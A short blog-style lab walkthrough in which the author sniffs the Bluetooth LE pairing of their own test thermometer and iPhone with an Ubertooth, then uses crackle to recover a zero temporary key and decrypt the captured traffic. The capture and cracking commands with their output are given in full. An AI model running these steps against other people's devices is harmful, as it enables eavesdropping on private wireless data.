How to crack Bluetooth LE security using crackle

I just watched this great talk about Bluetooth LE’s flawed security and thought I’d give crackle a try.

What you need:

1. A Bluetooth LE peripheral that uses security.  I used Broadcom’s WICED Smart and built the sample health_thermometer_plus application that uses encryption by default.

2. An Ubertooth, the totally awesome Bluetooth sniffer.

3. A BTLE capable host. I used an iPhone 5.

4. (Optional) Wireshark with the BTLE plugin.

BTLE cracking ingredients

Steps to crack:

1. Build WICED sample app. In order to do this on Linux you’ll need a bit of Wine magic:

 diff -Naur wiced_toolchain_common.orig
--- wiced_toolchain_common.orig    2014-02-11 14:18:09.128750842 -0800
+++    2014-02-11 14:14:21.160744316 -0800
@@ -101,6 +101,10 @@
 export SHELL       = $(COMMON_TOOLS_PATH)dash
 OPENOCD_FULL_NAME := "$(OPENOCD_PATH)Linux64/openocd-all-brcm-libftdi"
+CGS_FULL_NAME     := wine $(CGS_PATH)Win32/cgs.exe
+CHIPLOAD_FULL_NAME    := wine $(CHIPLOAD_PATH)Win32/chipload.exe
+HEX_TO_BIN_FULL_NAME  := wine $(HEX_TO_BIN_PATH)/Win32/ihex2bin.exe
 PRINT_SLASH       :=\\\\
 SLASH_QUOTE       :=\\\"
 ESC_QUOTE         :=\"

and tell wine where to find COM1 serial port:

ln -s /dev/ttyUSB0 ~/.wine/dosdevices/com1
echo com1 > /path/to/WICED-Smart-SDK/com_port.txt

Then build and download app to the target:

 ./make ROM.health_thermometer_plus-BCM920732TAG_Q32 UART=com1 download VERBOSE=0
Linking target ELF
OK, made elf.
Writing Hex image
Call to health_thermometer_plus_spar_crt_setup @ 00209551
Total RAM footprint                    15416 bytes (15.1kiB)

Converting CGS to HEX...
Conversion complete

Creating OTA images...
Conversion complete

Downloading application...
Download complete

Application running

2. Start capturing traffic with the ubertooth.

ubertooth-util -r ; ubertooth-btle -f -c /tmp/btle.cap

3. Connect with your iPhone. We really like LightBlue from Punch Through Design. You will be asked to pair. Do it.


4. Then, using the app, read some characteristics to get some data traffic flowing.

5. (Optional) Inspect your capture file with Wireshark. Confirm that you have an LL_START_ENC_REQ control PDU. And that after that point, all the traffic is encrypted (wireshark will report that as malformed L2CAP data packets.


6. Now run cryptle on the capture file.

crackle -i /tmp/btle.cap -o clear.cap
Warning: found multiple pairing requests, only using the latest one

TK found: 000000
ding ding ding, using a TK of 0! Just Cracks(tm)

7. You can now open clear.cap with wireshark and observe that the earlier malformed L2CAP packets show up as clear GATT frames. 


Rock on!